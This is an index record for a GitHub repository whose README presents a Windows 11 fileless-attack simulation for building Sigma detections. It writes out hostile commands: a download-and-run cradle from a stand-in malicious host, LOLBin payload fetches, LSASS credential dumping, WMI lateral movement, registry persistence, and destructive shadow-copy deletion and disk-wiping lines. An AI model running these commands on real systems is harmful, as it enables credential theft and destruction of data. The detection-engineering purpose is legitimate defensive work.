{"id":29095718,"url":"https://github.com/P1rat3L00t/Blu3F1R3","last_synced_at":"2025-06-28T11:06:56.835Z","repository":{"id":299938354,"uuid":"1004648000","full_name":"P1rat3L00t/BLU3F1R3","owner":"P1rat3L00t","description":"Fileless PoC malware for educational \u0026 security research purposes.","archived":false,"fork":false,"pushed_at":"2025-06-21T20:29:54.000Z","size":576,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-06-21T20:33:19.994Z","etag":null,"topics":["anydesk","blue-team","bsod","fileless-malware","living-off-the-land","log-analysis","lolbins","loldrivers","mitre-attack","purple-team","ransom-note","red-teaming","reflective-dll","registry-keys","threat-detection","windows-11"],"latest_commit_sha":null,"homepage":"https://lolol.farm/","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/P1rat3L00t.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-06-19T00:58:45.000Z","updated_at":"2025-06-21T20:29:57.000Z","dependencies_parsed_at":"2025-06-21T20:44:02.591Z","dependency_job_id":null,"html_url":"https://github.com/P1rat3L00t/BLU3F1R3","commit_stats":null,"previous_names":["mrf0xtut/yamata-no-orochic2","p1rat3l00t/blu3f1r3"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/P1rat3L00t/BLU3F1R3","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P1rat3L00t%2FBLU3F1R3","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P1rat3L00t%2FBLU3F1R3/tags
","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P1rat3L00t%2FBLU3F1R3/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P1rat3L00t%2FBLU3F1R3/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/P1rat3L00t","download_url":"https://codeload.github.com/P1rat3L00t/BLU3F1R3/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P1rat3L00t%2FBLU3F1R3/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":262419809,"owners_count":23308100,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["anydesk","blue-team","bsod","fileless-malware","living-off-the-land","log-analysis","lolbins","loldrivers","mitre-attack","purple-team","ransom-note","red-teaming","reflective-dll","registry-keys","threat-detection","windows-11"],"created_at":"2025-06-28T11:06:55.376Z","updated_at":"2025-06-28T11:06:56.818Z","avatar_url":"https://github.com/P1rat3L00t.png","language":"C++","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n# Windows 11 Threat Detection \u0026 Threat Intel via Sigma + MITRE ATT\u0026CK + LOLBins\n\n\u003e **Warning**  \n\u003e This project is for **educational, authorized research, and blue team simulation in isolated lab environments only**.  \n\u003e **Do not test on production or unauthorized systems.  
\n\u003e The authors are NOT responsible for misuse.**\n\n---\n\n![Threat Detection](https://github.com/user-attachments/assets/0360c1d6-32c1-416b-a93a-a02822d7a536)\n\n---\n\n## Table of Contents\n\n- [About](#about)\n- [Technical Overview](#technical-overview)\n- [Attack Chain Example (PowerShell)](#attack-chain-example-powershell)\n- [Reconnaissance and LOLBins](#reconnaissance-and-lolbins)\n- [Advanced Techniques](#advanced-techniques)\n- [MITRE ATT\u0026CK + Sigma Mapping](#mitre-attck--sigma-mapping)\n- [Destructive LOLBin Payloads](#destructive-lolbin-payloads)\n- [Log-Based Detection Engineering](#log-based-detection-engineering)\n- [Legal Disclaimer](#legal-disclaimer)\n- [References \u0026 Further Reading](#references--further-reading)\n\n---\n\n## About\n\nThis lab-oriented simulation demonstrates fileless attack chains using LOLBins and post-exploitation techniques on **Windows 11**. It is built to aid:\n\n- Blue teamers in building custom **Sigma detection rules**.\n- Threat hunters studying MITRE ATT\u0026CK tactics mapped to native Windows activity.\n- Log analysts working with **Sysmon, Event Viewer, and EVTX files**.\n\n---\n\n## Technical Overview\n\nThe project mimics advanced attacker behavior using trusted Windows binaries and in-memory payload delivery. 
Coverage includes:\n\n- **Initial Access \u0026 Execution:** Abuse of `rundll32`, `regsvr32`, `certutil`, etc.\n- **Privilege Escalation:** Print Spooler CVEs, HiveNightmare, SeriousSAM.\n- **Credential Access:** LSASS dump, SAM parsing.\n- **Lateral Movement:** `wmic`, `PowerShell` remoting.\n- **Destruction/Impact:** Payload encryption or wipe using only built-in tools.\n\nThese stages are aligned with **MITRE ATT\u0026CK** and tailored for **log analysis via Sigma rules and Sysmon events**.\n\n---\n\n## Attack Chain Example (PowerShell)\n\nA practical simulation using LOLBins and stealthy PowerShell:\n\n```powershell\n# Initial Access\nIEX(New-Object Net.WebClient).DownloadString(\"http://malicious.com/dropper.ps1\")\n\n# Reflective DLL Injection\nrundll32.exe \\\\192.168.X.X\\share\\payload.dll,ReflectEntry\n\n# Privilege Escalation\nStart-Process powershell -Args \"-ExecutionPolicy Bypass -File C:\\Temp\\elevate.ps1\" -Verb RunAs\n\n# Credential Dumping\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\\Temp\\lsass.dmp full\n\n# Lateral Movement\nwmic /node:targetPC process call create \"powershell.exe -File \\\\share\\payload.ps1\"\n\n# Persistence via Registry\nSet-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"Persistence\" -Value \"powershell -File C:\\Temp\\persist.ps1\"\n```\n\n---\n\n## Reconnaissance and LOLBins\n\n### LOLBins (Living Off the Land Binaries)\n\nThese built-in binaries are abused for fileless execution:\n\n```cmd\nregsvr32 /s /n /u /i:http://evil/payload.sct scrobj.dll\ncertutil -urlcache -split -f http://evil/payload.b64 drop.exe\nrundll32.exe \\\\192.168.X.X\\share\\payload.dll,ReflectEntry\n```\n\nUse Sigma to flag any suspicious use of these:\n\n```yaml\ndetection:\n  selection:\n    Image|endswith: '\\rundll32.exe'\n    CommandLine|contains: '\\\\'\n  condition: selection\n```\n\n---\n\n## Advanced Techniques\n\n### Fileless Embedding via Native 
Tools\n\n```cmd\ncopy /b clean.jpg + malware.7z clean.jpg\ncertutil -decode clean.jpg payload.7z\n7z x payload.7z -oC:\\Temp\\\n```\n\n### Reflective DLL Execution (In-Memory)\n\n```cmd\nrundll32.exe \\\\evilhost\\malicious.dll,ReflectEntry\n```\n\nTrack these behaviors via **Sysmon Event ID 1 + ID 7** and use Sigma rules to flag remote `.dll` execution or abnormal image loads.\n\n---\n\n## MITRE ATT\\\u0026CK + Sigma Mapping\n\n| Tactic               | Technique                     | ATT\\\u0026CK ID       | Sigma Detection Focus                        |\n| -------------------- | ----------------------------- | ---------------- | -------------------------------------------- |\n| Initial Access       | Malicious Office/Payload Drop | T1203            | Office macros, outbound HTTP from MS Office  |\n| Execution            | LOLBins \u0026 Scripting           | T1218, T1059     | regsvr32, rundll32, powershell, certutil     |\n| Privilege Escalation | Print Spooler, Hive ACL       | T1068, T1003.002 | Spoolsv.exe anomalies, SAM/LSASS file access |\n| Credential Access    | LSASS Dump, SAM Access        | T1003            | Access to lsass, use of comsvcs.dll          |\n| Lateral Movement     | Remote Service Execution      | T1021.002        | wmic, psexec, and abnormal remote processes  |\n| Impact               | File Encryption, VSS Deletion | T1486, T1490     | vssadmin, cipher.exe, shadow copy deletion   |\n\n---\n\n## Destructive LOLBin Payloads\n\nUsed in impact or ransomware simulation phases:\n\n```cmd\ncipher /w:C:\\\nvssadmin delete shadows /all /quiet\nbcdedit /set {default} recoveryenabled No\nforfiles /p C:\\ /s /d -2 /c \"cmd /c del /q @file\"\n```\n\nSigma Detection Example:\n\n```yaml\ndetection:\n  selection:\n    CommandLine|contains: 'cipher /w'\n  condition: selection\n```\n\n---\n\n## Log-Based Detection Engineering\n\n### Recommended Setup\n\n* **Sysmon Configuration:** Use [SwiftOnSecurity's sysmon 
config](https://github.com/SwiftOnSecurity/sysmon-config)\n* **Log Sources:**\n\n  * Microsoft-Windows-Sysmon/Operational\n  * Security.evtx\n  * Windows PowerShell logs\n  * WMI Activity logs\n\n### Tools\n\n* **Sigma:** Convert to Splunk/ELK with `sigmac`.\n* **EvtxECmd or Chainsaw:** Parse `.evtx` offline for hunting.\n* **RedCanary’s Atomic Red Team:** For validation testing.\n\n### Key Sigma Triggers\n\n| Event | Trigger Description                        |\n| ----- | ------------------------------------------ |\n| 1     | Process creation (e.g. rundll32, certutil) |\n| 7     | Image loaded (non-Microsoft DLLs)          |\n| 11    | File creation (e.g. lsass.dmp, .7z)        |\n| 13    | Registry key modification for persistence  |\n\n---\n\n## Legal Disclaimer\n\n\u003e All tools, code, and techniques are shared purely for authorized learning and research.\n\u003e Use only in test environments and always adhere to ethical and legal standards.\n\u003e The authors **take no responsibility** for misuse.\n\n---\n\n## References \u0026 Further Reading\n\n* [Sigma HQ](https://github.com/SigmaHQ/sigma)\n* [LOLBas Project](https://lolbas-project.github.io/)\n* [Sysmon](https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon)\n* [MITRE ATT\\\u0026CK](https://attack.mitre.org/)\n* [Chainsaw - Rapid Log Analysis](https://github.com/countercept/chainsaw)\n* [EvtxECmd](https://ericzimmerman.github.io/)\n* [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team)\n* [Print Spooler Exploits](https://itm4n.github.io/printnightmare-not-over/)\n\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FP1rat3L00t%2FBlu3F1R3","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FP1rat3L00t%2FBlu3F1R3","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FP1rat3L00t%2FBlu3F1R3/lists"}